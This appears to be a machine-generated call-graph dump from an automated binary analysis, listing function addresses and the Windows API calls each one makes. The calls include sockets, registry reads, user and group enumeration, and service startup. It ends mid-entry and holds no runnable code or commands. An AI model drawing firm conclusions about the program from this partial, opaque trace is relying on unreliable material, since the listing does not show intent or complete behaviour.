7ffe0eb50c1e 43675->43677 43682 7ffe0eb51c7b 11 API calls 43676->43682 43681 7ffe0eb51c7b 11 API calls 43677->43681 43680 7ffe0eb412f9 43680->43667 43680->43668 43680->43670 43681->43680 43682->43680 43684 7ffe0eb47cd6 GetSystemTimeAsFileTime 43683->43684 43685 7ffe0eb47ccb EnterCriticalSection 43683->43685 43684->43685 43685->43642 43687 7ffe0eb500da 43686->43687 43690 7ffe0eb50102 43686->43690 43688 7ffe0eb500e4 43687->43688 43689 7ffe0eb5014a 43687->43689 43691 7ffe0eb50120 43688->43691 43692 7ffe0eb500e6 43688->43692 43717 7ffe0eb4f8ba 101 API calls 43689->43717 43690->43642 43694 7ffe0eb50151 43691->43694 43695 7ffe0eb50127 43691->43695 43696 7ffe0eb500ed 43692->43696 43697 7ffe0eb50158 43692->43697 43718 7ffe0eb4f92f 57 API calls 43694->43718 43699 7ffe0eb50143 43695->43699 43700 7ffe0eb5012e 43695->43700 43701 7ffe0eb500ef 43696->43701 43702 7ffe0eb5010b 43696->43702 43719 7ffe0eb4fa61 34 API calls 43697->43719 43711 7ffe0eb4f7c8 43699->43711 43700->43690 43716 7ffe0eb4f7d6 194 API calls 43700->43716 43704 7ffe0eb5015f 43701->43704 43705 7ffe0eb500f6 43701->43705 43702->43690 43715 7ffe0eb4fb83 25 API calls 43702->43715 43720 7ffe0eb4fb0a 28 API calls 43704->43720 43705->43690 43714 7ffe0eb4fc03 44 API calls 43705->43714 43721 7ffe0eb4f780 43711->43721 43714->43690 43715->43690 43716->43690 43717->43690 43718->43690 43719->43690 43720->43690 43728 7ffe0eb4e2fb 43721->43728 43724 7ffe0eb4f7a1 43724->43690 43727 7ffe0eb4e2fb 2 API calls 43727->43724 43729 7ffe0eb4e311 QueryPerformanceFrequency QueryPerformanceCounter 43728->43729 43730 7ffe0eb4e306 43728->43730 43729->43730 43730->43724 43731 7ffe0eb46c3d 43730->43731 43768 7ffe0eb46bff 43731->43768 43734 7ffe0eb46c53 43734->43727 43739 7ffe0eb46c92 strlen 43742 7ffe0eb46caf 43739->43742 43743 7ffe0eb46cc8 strlen 43739->43743 43740 7ffe0eb46d39 43740->43734 43741 7ffe0eb46d41 strlen 43740->43741 43745 7ffe0eb46d6e strlen 43741->43745 43746 7ffe0eb46d58 43741->43746 43742->43743 43747 7ffe0eb46cb4 strlen 43742->43747 43790 7ffe0eb4d196 20 API calls 43743->43790 43792 7ffe0eb4d196 20 API calls 43745->43792 43746->43745 43749 7ffe0eb46d5d strlen 43746->43749 43747->43743 43748 7ffe0eb46d0e 43748->43734 43791 7ffe0eb4dcc8 18 API calls 43748->43791 43749->43745 43751 7ffe0eb46db1 43754 7ffe0eb46dbe 43751->43754 43755 7ffe0eb46dc7 CompareFileTime 43751->43755 43753 7ffe0eb46d37 43753->43740 43754->43734 43756 7ffe0eb46df7 43755->43756 43757 7ffe0eb46ddb 43755->43757 43795 7ffe0eb4c6f1 18 API calls 43756->43795 43757->43754 43793 7ffe0eb44988 32 API calls 43757->43793 43760 7ffe0eb46de4 43761 7ffe0eb46de8 43760->43761 43796 7ffe0eb44013 17 API calls 43760->43796 43794 7ffe0eb449a3 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 43761->43794 43764 7ffe0eb46e2c 43764->43761 43797 7ffe0eb44097 52 API calls 43764->43797 43766 7ffe0eb46e41 43766->43761 43798 7ffe0eb43c9c 29 API calls 43766->43798 43799 7ffe0eb45ac0 43768->43799 43772 7ffe0eb46c0c 43772->43734 43773 7ffe0eb41770 GetModuleHandleExA 43772->43773 43774 7ffe0eb417a2 GetLastError 43773->43774 43775 7ffe0eb41798 43773->43775 43776 7ffe0eb41292 16 API calls 43774->43776 43777 7ffe0eb4e0f1 43775->43777 43776->43775 43778 7ffe0eb4e102 43777->43778 43779 7ffe0eb4e138 43777->43779 43781 7ffe0eb4e107 43778->43781 43782 7ffe0eb4e168 43778->43782 43780 7ffe0eb41292 16 API calls 43779->43780 43788 7ffe0eb46c88 43780->43788 43784 7ffe0eb4e110 43781->43784 43785 7ffe0eb4e198 43781->43785 43783 7ffe0eb41292 16 API calls 43782->43783 43783->43788 43842 7ffe0eb4dfb2 18 API calls 43784->43842 43786 7ffe0eb41292 16 API calls 43785->43786 43786->43788 43788->43739 43788->43740 43789 7ffe0eb4e115 43789->43788 43790->43748 43791->43753 43792->43751 43793->43760 43794->43754 43795->43757 43796->43764 43797->43766 43798->43761 43813 7ffe0eb42472 43799->43813 43802 7ffe0eb45b07 strlen 43803 7ffe0eb45b40 strcmp 43802->43803 43805 7ffe0eb45b81 43803->43805 43806 7ffe0eb45b73 43803->43806 43840 7ffe0eb4dcc8 18 API calls 43805->43840 43806->43772 43812 7ffe0eb4533e 37 API calls 43806->43812 43808 7ffe0eb45ba7 43808->43806 43809 7ffe0eb45bb9 43808->43809 43841 7ffe0eb4d9e9 18 API calls 43809->43841 43811 7ffe0eb45bc3 43811->43806 43812->43772 43814 7ffe0eb4249b 43813->43814 43833 7ffe0eb424fa 43813->43833 43816 7ffe0eb424a4 43814->43816 43817 7ffe0eb4255d 43814->43817 43815 7ffe0eb41292 16 API calls 43838 7ffe0eb42553 43815->43838 43819 7ffe0eb42590 43816->43819 43820 7ffe0eb424ad 43816->43820 43818 7ffe0eb41292 16 API calls 43817->43818 43818->43838 43821 7ffe0eb41292 16 API calls 43819->43821 43822 7ffe0eb425c3 43820->43822 43823 7ffe0eb424b6 RegOpenKeyExA 43820->43823 43821->43838 43826 7ffe0eb41292 16 API calls 43822->43826 43824 7ffe0eb425f6 RegQueryValueExA 43823->43824 43825 7ffe0eb424dd 43823->43825 43829 7ffe0eb42624 43824->43829 43839 7ffe0eb42677 RegCloseKey 43824->43839 43828 7ffe0eb41292 16 API calls 43825->43828 43826->43838 43827 7ffe0eb428f9 43830 7ffe0eb41292 16 API calls 43827->43830 43828->43833 43837 7ffe0eb41292 16 API calls 43829->43837 43829->43839 43834 7ffe0eb42799 43830->43834 43832 7ffe0eb4291c 43833->43815 43833->43838 43834->43802 43834->43806 43835 7ffe0eb42756 43835->43832 43836 7ffe0eb41292 16 API calls 43835->43836 43836->43834 43837->43829 43838->43827 43838->43835 43839->43838 43840->43808 43841->43811 43842->43789 43843 7ffe0e16184a 43851 7ffe0e161855 43843->43851 43844 7ffe0e16195e 43845 7ffe0e16196b 43844->43845 43910 7ffe0e1622d5 10 API calls 43844->43910 43846 7ffe0e16187d Sleep 43846->43851 43850 7ffe0e161932 Sleep 43850->43851 43851->43844 43851->43846 43851->43850 43852 7ffe0e1622d5 10 API calls 43851->43852 43854 7ffe0e16191e memcpy 43851->43854 43855 7ffe0e16256c socket 43851->43855 43890 7ffe0e162a1a 43851->43890 43901 7ffe0e161780 43851->43901 43852->43851 43854->43851 43856 7ffe0e1625a3 43855->43856 43857 7ffe0e16276b WSAGetLastError 43855->43857 43858 7ffe0e1625c5 43856->43858 43859 7ffe0e1625a7 43856->43859 43860 7ffe0e161292 6 API calls 43857->43860 43863 7ffe0e162209 8 API calls 43858->43863 43911 7ffe0e162209 43859->43911 43862 7ffe0e16278f 43860->43862 43865 7ffe0e1625df 43862->43865 43866 7ffe0e162799 43862->43866 43867 7ffe0e1625c3 43863->43867 43868 7ffe0e161292 6 API calls 43865->43868 43928 7ffe0e161292 43866->43928 43889 7ffe0e1625d7 43867->43889 43924 7ffe0e16233a setsockopt 43867->43924 43871 7ffe0e162600 43868->43871 43869 7ffe0e16261e 43873 7ffe0e162623 htonl htons connect 43869->43873 43869->43889 43871->43851 43876 7ffe0e162661 43873->43876 43877 7ffe0e16267c WSAGetLastError 43873->43877 43878 7ffe0e162209 8 API calls 43876->43878 43879 7ffe0e16273e WSAGetLastError 43877->43879 43880 7ffe0e16268d 43877->43880 43882 7ffe0e16266e 43878->43882 43881 7ffe0e161292 6 API calls 43879->43881 43883 7ffe0e162695 select 43880->43883 43880->43889 43881->43889 43882->43862 43882->43889 43884 7ffe0e162720 43883->43884 43885 7ffe0e1626f6 43883->43885 43886 7ffe0e161292 6 API calls 43884->43886 43885->43876 43887 7ffe0e1626fc WSAGetLastError 43885->43887 43886->43889 43888 7ffe0e161292 6 API calls 43887->43888 43888->43889 43939 7ffe0e1622d5 10 API calls 43889->43939 43891 7ffe0e162a34 43890->43891 43892 7ffe0e162aa8 43890->43892 43891->43892 43894 7ffe0e162a39 recv 43891->43894 43893 7ffe0e161292 6 API calls 43892->43893 43895 7ffe0e162a53 43893->43895 43896 7ffe0e162a4f 43894->43896 43897 7ffe0e162a5c WSAGetLastError 43894->43897 43895->43851 43896->43895 43900 7ffe0e161292 6 API calls 43896->43900 43897->43895 43898 7ffe0e162a70 43897->43898 43899 7ffe0e161292 6 API calls 43898->43899 43899->43895 43900->43895 43902 7ffe0e161842 43901->43902 43903 7ffe0e161798 43901->43903 43902->43851 43903->43902 43948 7ffe0e16a000 43903->43948 43906 7ffe0e161834 LeaveCriticalSection 43906->43902 43907 7ffe0e1617c8 43907->43906 43908 7ffe0e161292 6 API calls 43907->43908 43951 7ffe0e16e342 43907->43951 43908->43907 43910->43845 43912 7ffe0e162219 ioctlsocket 43911->43912 43914 7ffe0e16224d WSAGetLastError 43912->43914 43915 7ffe0e16223c 43912->43915 43916 7ffe0e161292 6 API calls 43914->43916 43915->43869 43917 7ffe0e162154 setsockopt 43915->43917 43916->43915 43918 7ffe0e1621e4 WSAGetLastError 43917->43918 43919 7ffe0e162189 setsockopt 43917->43919 43921 7ffe0e161292 6 API calls 43918->43921 43920 7ffe0e1621bf WSAGetLastError 43919->43920 43923 7ffe0e1621b5 43919->43923 43922 7ffe0e161292 6 API calls 43920->43922 43921->43923 43922->43923 43923->43867 43925 7ffe0e162381 WSAGetLastError 43924->43925 43926 7ffe0e162377 43924->43926 43927 7ffe0e161292 6 API calls 43925->43927 43926->43869 43927->43926 43929 7ffe0e1612a0 43928->43929 43940 7ffe0e16f010 43929->43940 43932 7ffe0e16135c EnterCriticalSection 43934 7ffe0e161376 LeaveCriticalSection 43932->43934 43936 7ffe0e161393 43932->43936 43933 7ffe0e161327 fwrite fflush 43935 7ffe0e161350 43933->43935 43934->43933 43935->43871 43937 7ffe0e1613cd CopyFileA 43936->43937 43938 7ffe0e161405 43937->43938 43938->43934 43939->43865 43941 7ffe0e16f035 43940->43941 43942 7ffe0e16f01e 43940->43942 43947 7ffe0e17004b fputc 43941->43947 43946 7ffe0e17004b fputc 43942->43946 43945 7ffe0e1612f9 43945->43932 43945->43933 43945->43935 43946->43945 43947->43945 43949 7ffe0e1617ab EnterCriticalSection 43948->43949 43950 7ffe0e16a016 GetSystemTimeAsFileTime 43948->43950 43949->43907 43950->43949 43952 7ffe0e16e372 43951->43952 43971 7ffe0e16e3bc 43951->43971 43953 7ffe0e16e380 43952->43953 43954 7ffe0e16e4c7 43952->43954 43955 7ffe0e16e434 43953->43955 43956 7ffe0e16e386 43953->43956 44003 7ffe0e16dc30 70 API calls 43954->44003 43960 7ffe0e16e47c 43955->43960 43961 7ffe0e16e43b 43955->43961 43958 7ffe0e16e4d5 43956->43958 43959 7ffe0e16e391 43956->43959 44005 7ffe0e16e09c 56 API calls 43958->44005 43962 7ffe0e16e393 43959->43962 43963 7ffe0e16e3e6 43959->43963 43964 7ffe0e16e483 43960->43964 43965 7ffe0e16e4c0 43960->43965 43961->43971 44000 7ffe0e16d86e 57 API calls 43961->44000 43969 7ffe0e16e39a 43962->43969 43979 7ffe0e16e3cb 43962->43979 43967 7ffe0e16e3f1 43963->43967 43968 7ffe0e16e4ce 43963->43968 43964->43971 43993 7ffe0e16d2bb 43964->43993 44002 7ffe0e16d95d 52 API calls 43965->44002 43972 7ffe0e16e3f3 43967->43972 43973 7ffe0e16e419 43967->43973 44004 7ffe0e16de68 53 API calls 43968->44004 43975 7ffe0e16e3a5 43969->43975 43976 7ffe0e16e4e3 43969->43976 43971->43907 43980 7ffe0e16e3fe 43972->43980 43981 7ffe0e16e4dc 43972->43981 43973->43971 43999 7ffe0e16df82 53 API calls 43973->43999 43982 7ffe0e16e3b0 43975->43982 43983 7ffe0e16e491 43975->43983 44007 7ffe0e16e2bc 16 API calls 43976->44007 43979->43971 43997 7ffe0e16e22c 16 API calls 43979->43997 43980->43971 43986 7ffe0e16e405 43980->43986 44006 7ffe0e16e143 49 API calls 43981->44006 43982->43971 43996 7ffe0e16d342 14 API calls 43982->43996 44001 7ffe0e16d2c9 18 API calls 43983->44001 43998 7ffe0e16da46 57 API calls 43986->43998 43992 7ffe0e16e40a 43992->43971 44008 7ffe0e16d110 43993->44008 43996->43971 43997->43971 43998->43992 43999->43971 44000->43971 44001->43971 44002->43971 44003->43992 44004->43971 44005->43971 44006->43971 44007->43971 44035 7ffe0e1691fb 44008->44035 44013 7ffe0e16d160 44041 7ffe0e165a68 17 API calls 44013->44041 44014 7ffe0e16d167 44015 7ffe0e16a000 GetSystemTimeAsFileTime 44014->44015 44019 7ffe0e16d17a 44015->44019 44017 7ffe0e16d298 44043 7ffe0e165a68 17 API calls 44017->44043 44019->44017 44021 7ffe0e16d1a6 strlen 44019->44021 44020 7ffe0e16d29d 44023 7ffe0e1691fb 2 API calls 44020->44023 44025 7ffe0e16d13a 44020->44025 44022 7ffe0e161292 6 API calls 44021->44022 44024 7ffe0e16d1de GetProcessHeap HeapAlloc 44022->44024 44023->44025 44026 7ffe0e16d200 44024->44026 44027 7ffe0e16d27d 44024->44027 44025->43971 44029 7ffe0e16a000 GetSystemTimeAsFileTime 44026->44029 44028 7ffe0e161292 6 API calls 44027->44028 44030 7ffe0e16d293 44028->44030 44031 7ffe0e16d22f strcpy 44029->44031 44030->44017 44042 7ffe0e161992 13 API calls 44031->44042 44033 7ffe0e16d258 44033->44019 44034 7ffe0e16d261 GetProcessHeap HeapFree 44033->44034 44034->44019 44036 7ffe0e169211 QueryPerformanceFrequency QueryPerformanceCounter 44035->44036 44037 7ffe0e169206 44035->44037 44036->44037 44037->44025 44038 7ffe0e165a47 EnterCriticalSection 44037->44038 44044 7ffe0e164049 44038->44044 44041->44025 44042->44033 44043->44020 44045 7ffe0e164065 44044->44045 44046 7ffe0e164055 44044->44046 44050 7ffe0e162fbf 44045->44050 44048 7ffe0e16405f 44046->44048 44072 7ffe0e16387f 44046->44072 44048->44013 44048->44014 44093 7ffe0e162edf 8 API calls 44050->44093 44052 7ffe0e1635d6 44053 7ffe0e1635df 44052->44053 44054 7ffe0e16361c 44052->44054 44056 7ffe0e163729 44053->44056 44063 7ffe0e1635e7 44053->44063 44057 7ffe0e161292 6 API calls 44054->44057 44055 7ffe0e1634d0 NetLocalGroupEnum 44058 7ffe0e162fd4 44055->44058 44061 7ffe0e161292 6 API calls 44056->44061 44057->44063 44058->44052 44058->44055 44059 7ffe0e163546 GetProcessHeap HeapAlloc 44058->44059 44062 7ffe0e1634ad NetApiBufferFree 44058->44062 44064 7ffe0e162fe3 44059->44064 44065 7ffe0e163579 44059->44065 44067 7ffe0e163609 44061->44067 44062->44058 44094 7ffe0e162edf 8 API calls 44063->44094 44064->44058 44070 7ffe0e161292 6 API calls 44064->44070 44068 7ffe0e163585 memcpy GetProcessHeap HeapFree 44065->44068 44069 7ffe0e1635b4 44065->44069 44066 7ffe0e1635ec 44071 7ffe0e161292 6 API calls 44066->44071 44067->44046 44068->44069 44069->44046 44070->44064 44071->44067 44095 7ffe0e16379f 44072->44095 44074 7ffe0e163ed7 44076 7ffe0e161292 6 API calls 44074->44076 44092 7ffe0e163ee0 44074->44092 44075 7ffe0e163dba NetUserEnum 44077 7ffe0e163894 44075->44077 44076->44092 44077->44074 44077->44075 44079 7ffe0e163d97 NetApiBufferFree 44077->44079 44081 7ffe0e163e36 GetProcessHeap HeapAlloc 44077->44081 44078 7ffe0e164014 44082 7ffe0e161292 6 API calls 44078->44082 44079->44077 44080 7ffe0e16379f 8 API calls 44083 7ffe0e163eed 44080->44083 44084 7ffe0e1638a3 44081->44084 44085 7ffe0e163e70 44081->44085 44086 7ffe0e163f0a 44082->44086 44088 7ffe0e161292 6 API calls 44083->44088 44084->44077 44087 7ffe0e161292 6 API calls 44084->44087 44089 7ffe0e163eb5 44085->44089 44090 7ffe0e163e7c memcpy GetProcessHeap HeapFree 44085->44090 44086->44048 44087->44084 44088->44086 44089->44048 44090->44089 44091 7ffe0e163ee8 44091->44080 44092->44078 44092->44091 44093->44058 44094->44066 44096 7ffe0e163864 44095->44096 44098 7ffe0e1637b2 44095->44098 44096->44077 44097 7ffe0e163841 44097->44096 44099 7ffe0e16384d GetProcessHeap HeapFree 44097->44099 44098->44097 44100 7ffe0e1637e7 GetProcessHeap HeapFree 44098->44100 44101 7ffe0e16380c GetProcessHeap HeapFree 44098->44101 44102 7ffe0e163831 LocalFree 44098->44102 44103 7ffe0e163839 LocalFree 44098->44103 44099->44096 44100->44098 44101->44098 44102->44098 44103->44098 44104 7ff76a9012fd 44107 7ff76a901131 44104->44107 44108 7ff76a90115a 44107->44108 44109 7ff76a901172 44108->44109 44110 7ff76a901169 Sleep 44108->44110 44111 7ff76a901194 44109->44111 44112 7ff76a901188 _amsg_exit 44109->44112 44110->44108 44113 7ff76a9011b5 44111->44113 44114 7ff76a90119a _initterm 44111->44114 44112->44113 44115 7ff76a9011c5 _initterm 44113->44115 44116 7ff76a9011de 44113->44116 44114->44113 44115->44116 44128 7ff76a90a27a 44116->44128 44119 7ff76a90122e 44120 7ff76a901233 malloc 44119->44120 44121 7ff76a901253 44120->44121 44122 7ff76a901283 44121->44122 44123 7ff76a901258 strlen malloc 44121->44123 44141 7ff76a908e30 44122->44141 44123->44121 44125 7ff76a9012c4 44126 7ff76a9012e3 _cexit 44125->44126 44127 7ff76a9012e8 44125->44127 44126->44127 44129 7ff76a901208 SetUnhandledExceptionFilter 44128->44129 44130 7ff76a90a298 44128->44130 44129->44119 44131 7ff76a90a315 44130->44131 44132 7ff76a90a494 44130->44132 44137 7ff76a90a34a 44130->44137 44131->44132 44134 7ff76a90a329 44131->44134 44132->44129 44133 7ff76a90a4bc VirtualProtect 44132->44133 44133->44132 44134->44131 44145 7ff76a90a134 6 API calls 44134->44145 44137->44132 44138 7ff76a90a36d 44137->44138 44146 7ff76a90a134 6 API calls 44138->44146 44147 7ff76a90a0d0 VirtualQuery VirtualProtect GetLastError 44138->44147 44148 7ff76a90a0d0 VirtualQuery VirtualProtect GetLastError 44138->44148 44142 7ff76a908e40 44141->44142 44149 7ff76a908c4a 44142->44149 44145->44134 44146->44137 44147->44137 44148->44137 44150 7ff76a908c54 strcmp 44149->44150 44152 7ff76a908c6b strcmp 44150->44152 44153 7ff76a908cce 44150->44153 44154 7ff76a908e08 44152->44154 44155 7ff76a908c82 StartServiceCtrlDispatcherA 44152->44155 44170 7ff76a90849a 44153->44170 44157 7ff76a9099e2 6 API calls 44154->44157 44158 7ff76a908d26 GetLastError 44155->44158 44166 7ff76a908cbb 44155->44166 44157->44166 44234 7ff76a9099e2 44158->44234 44161 7ff76a908cd9 44189 7ff76a9088ee 10 API calls 44161->44189 44164 7ff76a908cde 44190 7ff76a9089aa 13 API calls 44164->44190 44166->44125 44167 7ff76a908cf7 _read 44167->44161 44168 7ff76a908ced 44167->44168 44168->44161 44168->44167 44225 7ff76a90886d 44168->44225 44245 7ff76a901360 GetModuleHandleExA 44170->44245 44175 7ff76a9084cc 44176 7ff76a9084d0 44175->44176 44307 7ff76a9093f0 44175->44307 44176->44161 44191 7ff76a908563 44176->44191 44184 7ff76a901360 8 API calls 44185 7ff76a908530 44184->44185 44186 7ff76a904bc4 12 API calls 44185->44186 44187 7ff76a908549 44186->44187 44187->44176 44359 7ff76a906242 44187->44359 44189->44164 44190->44166 44192 7ff76a901360 8 API calls 44191->44192 44193 7ff76a9085ae 44192->44193 44194 7ff76a904ab1 8 API calls 44193->44194 44195 7ff76a9085c3 44194->44195 44196 7ff76a9085cd strlen 44195->44196 44205 7ff76a9087cd 44195->44205 44198 7ff76a9085ea 44196->44198 44199 7ff76a908603 _mbscpy strlen strlen 44196->44199 44197 7ff76a908805 44197->44168 44198->44199 44200 7ff76a9085ef strlen 44198->44200 44204 7ff76a90864a 44199->44204 44200->44199 44201 7ff76a9087c3 44736 7ff76a901cd8 FindClose 44201->44736 44202 7ff76a901cf3 12 API calls 44202->44204 44204->44201 44204->44202 44208 7ff76a901694 8 API calls 44204->44208 44211 7ff76a901613 8 API calls 44204->44211 44212 7ff76a908715 44204->44212 44214 7ff76a90866e FreeLibrary 44204->44214 44735 7ff76a9081e0 SetServiceStatus 44204->44735 44205->44197 44206 7ff76a9087e4 44205->44206 44209 7ff76a9099e2 6 API calls 44205->44209 44677 7ffe11ec34b0 44205->44677 44690 7ffe0e16bdc0 44205->44690 44705 7ffe1150a930 44205->44705 44718 7ffe0eb48440 44205->44718 44737 7ff76a9081e0 SetServiceStatus 44205->44737 44207 7ff76a9099e2 6 API calls 44206->44207 44207->44197 44208->44204 44209->44205 44211->44204 44213 7ff76a9099e2 6 API calls 44212->44213 44215 7ff76a90872d GetProcessHeap HeapAlloc 44213->44215 44214->44204 44217 7ff76a90874f _mbscpy 44215->44217 44218 7ff76a908776 44215->44218 44217->44218 44219 7ff76a90879b 44217->44219 44220 7ff76a9099e2 6 API calls 44218->44220 44219->44201 44219->44219 44220->44219 44226 7ff76a901360 8 API calls 44225->44226 44227 7ff76a90889c 44226->44227 44228 7ff76a904ab1 8 API calls 44227->44228 44229 7ff76a9088ae 44228->44229 44230 7ff76a90824d 20 API calls 44229->44230 44233 7ff76a9088b4 44229->44233 44231 7ff76a9088ca 44230->44231 44232 7ff76a9088d7 SleepEx 44231->44232 44231->44233 44232->44233 44233->44168 44235 7ff76a9099f0 44234->44235 45535 7ff76a90ab10 44235->45535 44238 7ff76a909a77 fwrite fflush 44241 7ff76a909aa0 44238->44241 44239 7ff76a909aac EnterCriticalSection 44240 7ff76a909ac6 LeaveCriticalSection 44239->44240 44242 7ff76a909ae3 44239->44242 44240->44238 44241->44166 44243 7ff76a909b1d CopyFileA 44242->44243 44244 7ff76a909b55 44243->44244 44244->44240 44246 7ff76a901392 GetLastError 44245->44246 44247 7ff76a901388 44245->44247 44248 7ff76a9099e2 6 API calls 44246->44248 44249 7ff76a904bc4 44247->44249 44248->44247 44250 7ff76a904c0a 44249->44250 44251 7ff76a904bda 44249->44251 44252 7ff76a9099e2 6 API calls 44250->44252 44382 7ff76a904ab1 44251->44382 44255 7ff76a904beb 44252->44255 44255->44175 44260 7ff76a903d81 44255->44260 44256 7ff76a904c3a strlen 44257 7ff76a904c62 _mbscat strlen 44256->44257 44258 7ff76a904c4c 44256->44258 44257->44255 44258->44257 44259 7ff76a904c51 strlen 44258->44259 44259->44257 44261 7ff76a903e84 44260->44261 44262 7ff76a903d98 44260->44262 44263 7ff76a9099e2 6 API calls 44261->44263 44264 7ff76a903eb4 44262->44264 44265 7ff76a903da1 CreateFileA 44262->44265 44272 7ff76a903e39 44263->44272 44268 7ff76a9099e2 6 API calls 44264->44268 44266 7ff76a903dec LockFileEx 44265->44266 44267 7ff76a903ee7 GetLastError 44265->44267 44270 7ff76a903e20 44266->44270 44271 7ff76a903fcc GetLastError 44266->44271 44269 7ff76a9099e2 6 API calls 44267->44269 44268->44272 44280 7ff76a903f08 44269->44280 44270->44272 44273 7ff76a90413d CloseHandle 44270->44273 44274 7ff76a9099e2 6 API calls 44271->44274 44275 7ff76a90414b 44272->44275 44276 7ff76a903e63 44272->44276 44273->44275 44282 7ff76a903fed 44274->44282 44278 7ff76a9099e2 6 API calls 44275->44278 44277 7ff76a9099e2 6 API calls 44276->44277 44279 7ff76a903e79 44277->44279 44278->44279 44279->44176 44283 7ff76a909b8c InitializeCriticalSectionAndSpinCount 44279->44283 44280->44271 44281 7ff76a90403e 44280->44281 44281->44273 44281->44282 44282->44281 44284 7ff76a909bba 44283->44284 44285 7ff76a909cdd GetLastError 44283->44285 44286 7ff76a901360 8 API calls 44284->44286 44287 7ff76a9099e2 6 API calls 44285->44287 44288 7ff76a909bd6 44286->44288 44292 7ff76a909cb6 44287->44292 44289 7ff76a904ab1 8 API calls 44288->44289 44290 7ff76a909bea 44289->44290 44291 7ff76a909bf4 strlen 44290->44291 44290->44292 44294 7ff76a909c0d 44291->44294 44295 7ff76a909c23 44291->44295 44293 7ff76a9099e2 6 API calls 44292->44293 44296 7ff76a909cd3 44293->44296 44294->44295 44297 7ff76a909c12 strlen 44294->44297 44298 7ff76a909c48 strlen fopen 44295->44298 44299 7ff76a909c28 _mbscat strlen 44295->44299 44296->44175 44297->44295 44300 7ff76a909daa 44298->44300 44301 7ff76a909c94 44298->44301 44299->44298 44303 7ff76a9099e2 6 API calls 44300->44303 44302 7ff76a9099e2 6 API calls 44301->44302 44304 7ff76a909cae 44302->44304 44303->44292 44304->44292 44305 7ff76a909e1a 44304->44305 44306 7ff76a9099e2 6 API calls 44305->44306 44306->44296 44396 7ff76a901694 44307->44396 44311 7ff76a909457 FreeLibrary 44314 7ff76a9094b7 GetNativeSystemInfo GetWindowsDirectoryA 44311->44314 44334 7ff76a90948d 44311->44334 44313 7ff76a9099e2 6 API calls 44337 7ff76a9084fe 44313->44337 44316 7ff76a9095ce 44314->44316 44317 7ff76a9094f6 GetLastError 44314->44317 44319 7ff76a9099e2 6 API calls 44316->44319 44318 7ff76a9099e2 6 API calls 44317->44318 44318->44334 44321 7ff76a9095ef 44319->44321 44320 7ff76a9099e2 6 API calls 44320->44311 44321->44334 44412 7ff76a905602 44321->44412 44323 7ff76a9099e2 6 API calls 44330 7ff76a90962b 44323->44330 44324 7ff76a90963b GetVolumeInformationA 44325 7ff76a90979b 44324->44325 44326 7ff76a90969e GetLastError 44324->44326 44327 7ff76a9099e2 6 API calls 44325->44327 44328 7ff76a9099e2 6 API calls 44326->44328 44329 7ff76a9097b8 44327->44329 44328->44330 44331 7ff76a9097cf strlen 44329->44331 44332 7ff76a9097e1 44329->44332 44330->44323 44330->44324 44330->44334 44331->44332 44333 7ff76a9098a3 44331->44333 44335 7ff76a9099e2 6 API calls 44332->44335 44333->44332 44336 7ff76a9098b7 _errno 44333->44336 44334->44313 44335->44337 44338 7ff76a90e4f0 44336->44338 44337->44176 44342 7ff76a90836f 44337->44342 44339 7ff76a9098e1 _errno 44338->44339 44339->44332 44340 7ff76a9098fa _errno 44339->44340 44341 7ff76a9099e2 6 API calls 44340->44341 44341->44332 44343 7ff76a901360 8 API calls 44342->44343 44344 7ff76a9083b4 44343->44344 44345 7ff76a904ab1 8 API calls 44344->44345 44346 7ff76a9083c6 44345->44346 44347 7ff76a9083cc _mbscpy 44346->44347 44348 7ff76a9083f6 44346->44348 44439 7ff76a90824d strlen 44347->44439 44350 7ff76a9099e2 6 API calls 44348->44350 44352 7ff76a908421 44350->44352 44352->44176 44352->44184 44353 7ff76a9083f2 44353->44348 44354 7ff76a908471 44353->44354 44357 7ff76a9099e2 6 API calls 44354->44357 44357->44352 44360 7ff76a9062f5 44359->44360 44361 7ff76a90626a 44359->44361 44363 7ff76a9099e2 6 API calls 44360->44363 44362 7ff76a902515 30 API calls 44361->44362 44365 7ff76a906279 44362->44365 44364 7ff76a906283 44363->44364 44366 7ff76a9062a4 44364->44366 44367 7ff76a90628d GetProcessHeap HeapFree 44364->44367 44365->44364 44370 7ff76a9063ad GetProcessHeap HeapAlloc 44365->44370 44368 7ff76a9065e2 44366->44368 44373 7ff76a9062cc 44366->44373 44367->44366 44369 7ff76a9099e2 6 API calls 44368->44369 44372 7ff76a906604 44369->44372 44371 7ff76a906420 44370->44371 44379 7ff76a9063ea 44370->44379 44374 7ff76a9099e2 6 API calls 44371->44374 44381 7ff76a9099e2 6 API calls 44372->44381 44375 7ff76a9099e2 6 API calls 44373->44375 44374->44379 44376 7ff76a9062e2 44375->44376 44376->44176 44377 7ff76a9065be 44377->44364 44378 7ff76a906503 strncpy strncpy 44378->44379 44379->44364 44379->44377 44379->44378 44380 7ff76a906578 strncpy 44379->44380 44380->44379 44381->44372 44383 7ff76a904ac2 44382->44383 44384 7ff76a904af8 44382->44384 44385 7ff76a904b28 44383->44385 44386 7ff76a904ac7 44383->44386 44387 7ff76a9099e2 6 API calls 44384->44387 44390 7ff76a9099e2 6 API calls 44385->44390 44388 7ff76a904ad0 44386->44388 44389 7ff76a904b58 44386->44389 44393 7ff76a904add 44387->44393 44395 7ff76a904972 8 API calls 44388->44395 44391 7ff76a9099e2 6 API calls 44389->44391 44390->44393 44391->44393 44393->44255 44393->44256 44394 7ff76a904ad5 44394->44393 44395->44394 44397 7ff76a9016a2 LoadLibraryA 44396->44397 44398 7ff76a9016cb 44396->44398 44399 7ff76a9016b0 44397->44399 44400 7ff76a9016ce GetLastError 44397->44400 44398->44400 44401 7ff76a9099e2 6 API calls 44399->44401 44402 7ff76a9099e2 6 API calls 44400->44402 44403 7ff76a9016c9 44401->44403 44402->44403 44403->44334 44404 7ff76a901613 44403->44404 44405 7ff76a901661 44404->44405 44406 7ff76a901630 GetProcAddress 44404->44406 44407 7ff76a901666 GetLastError 44405->44407 44406->44407 44408 7ff76a901641 44406->44408 44410 7ff76a9099e2 6 API calls 44407->44410 44409 7ff76a9099e2 6 API calls 44408->44409 44411 7ff76a90165f 44409->44411 44410->44411 44411->44311 44411->44320 44413 7ff76a90562b 44412->44413 44436 7ff76a90568a 44412->44436 44415 7ff76a905634 44413->44415 44416 7ff76a9056ed 44413->44416 44414 7ff76a9099e2 6 API calls 44435 7ff76a9056e3 44414->44435 44418 7ff76a905720 44415->44418 44419 7ff76a90563d 44415->44419 44417 7ff76a9099e2 6 API calls 44416->44417 44417->44435 44420 7ff76a9099e2 6 API calls 44418->44420 44421 7ff76a905646 RegOpenKeyExA 44419->44421 44422 